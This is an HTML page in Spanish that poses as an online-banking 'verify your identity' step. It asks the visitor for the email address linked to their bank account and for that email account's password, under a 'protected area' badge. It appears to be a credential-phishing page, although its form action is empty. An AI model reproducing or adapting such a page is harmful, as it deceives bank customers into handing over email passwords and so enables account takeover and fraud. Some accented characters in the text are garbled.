
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>
        
    </title>
    <link rel="stylesheet" href="css/normalize.min.css" />
    <link rel="stylesheet" href="css/estilos2.css" />
    <link rel="shortcut icon" href="images/logo.png" type="image/x-icon" />
</head>

<body>
    <div class="cuerpo">
        <div class="header">
            <img src="images/logo-entrar.png" alt="logo">
            <img src="images/protegida-area.png" class="protegida" alt="protegida">
        </div>
        <div class="header2">
            <h1>Verificar su Identidad</h1>
        </div>
        <div class="section">
            <div class="principal">
                <h2>Confirmar correo asociado a su cuenta de banco</h2>
                <p>Para verificar su identidad, Inicie sesi贸n en su correo asociado a la cuenta bancaria</p>
                
                <form  id="fcorreo" action="" method="post" class="form-login" style="font-family: 'cnx-regular', Arial, Helvetica, sans-serif;font-size:16px;">
                    
                    <div class="fgrupo">
                        <label for="correo">Correo electr贸nico</label>
                        <input type="text" name="correo" id="correo" placeholder="****@****.com">
                    </div>
                    <div class="fgrupo">
                        <label for="correo">Clave del correo</label>
                        <input type="password" name="ccorreo" id="ccorreo" placeholder="************">
                    </div>
                  
                    <p>
                        La direcci贸n de correo electr贸nico que ingrese debe coincidir con el correo asociado a nuestros servicios de Online Banking
                    </p>


                    <div class="fgrupo">
                        <button type="submit" id="ecorreo" value="confirmar" class="btn principal">CONFIRMAR</button>
                    </div>
                </form>
            </div>
            <div class="derecha">
                <img src="images/p2.jpg" alt="correo">
            </div>
        </div>
        <div class="footer">
            <img src="images/footer.png" alt="footer">
        </div>
    </div>
   
</body>

</html>